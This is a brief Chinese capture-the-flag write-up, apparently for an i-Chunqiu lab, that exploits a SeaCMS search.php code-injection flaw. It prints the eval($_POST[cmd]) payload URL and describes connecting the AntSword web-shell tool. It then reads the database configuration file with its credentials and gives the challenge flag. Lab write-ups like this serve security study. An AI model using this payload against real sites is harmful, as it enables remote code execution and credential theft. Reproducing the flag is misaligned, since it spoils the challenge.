题目
解题
参考WP
https://blog.csdn.net/qq_40654505/article/details/107142533/
目录扫描
复现wp
payload为:
search.php?searchtype=5&tid=&area=eval($_POST[cmd])
使用蚁剑连接
http://eci-2ze4iyhwj7xvb68bsb2t.cloudeci1.ichunqiu.com:80/search.php?searchtype=5&tid=&area=eval($_POST[cmd])cmd
找到数据库配置文件,/var/www/html/data/common.inc.php
<?php
//数据库连接信息
$cfg_dbhost = '127.0.0.1';
$cfg_dbname = 'seacms';
$cfg_dbuser = 'sea_user';
$cfg_dbpwd = '46e06533407e';
$cfg_dbprefix = 'sea_';
$cfg_db_language = 'utf8';
?>
鼠标右击这条shell,选择数据操作,添加上面的数据库用户名和密码连接数据库
flag{d2317097-0b48-4bbc-a968-90ec76ac67ea}
